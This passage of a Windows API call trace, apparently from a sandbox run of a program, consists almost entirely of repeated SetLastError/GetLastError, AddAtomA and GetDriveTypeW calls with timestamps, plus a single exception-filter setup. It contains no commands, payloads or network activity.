0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.068] SetLastError (dwErrCode=0x0) [0112.068] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.069] GetLastError () returned 0x0 [0112.069] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.070] GetLastError () returned 0x0 [0112.070] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.071] GetLastError () returned 0x0 [0112.071] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.072] SetLastError (dwErrCode=0x0) [0112.072] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.073] SetLastError (dwErrCode=0x0) [0112.073] GetLastError () returned 0x0 [0112.074] SetLastError (dwErrCode=0x0) [0112.074] GetLastError () returned 0x0 [0112.074] SetLastError (dwErrCode=0x0) [0112.074] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0112.074] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.075] AddAtomA (lpString=0x0) returned 0x0 [0112.075] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.076] AddAtomA (lpString=0x0) returned 0x0 [0112.076] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.077] AddAtomA (lpString=0x0) returned 0x0 [0112.077] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.078] AddAtomA (lpString=0x0) returned 0x0 [0112.078] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.079] AddAtomA (lpString=0x0) returned 0x0 [0112.079] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.080] AddAtomA (lpString=0x0) returned 0x0 [0112.080] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.081] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.081] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.082] AddAtomA (lpString=0x0) returned 0x0 [0112.082] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.083] AddAtomA (lpString=0x0) returned 0x0 [0112.083] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA (lpString=0x0) returned 0x0 [0112.084] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0112.084] AddAtomA 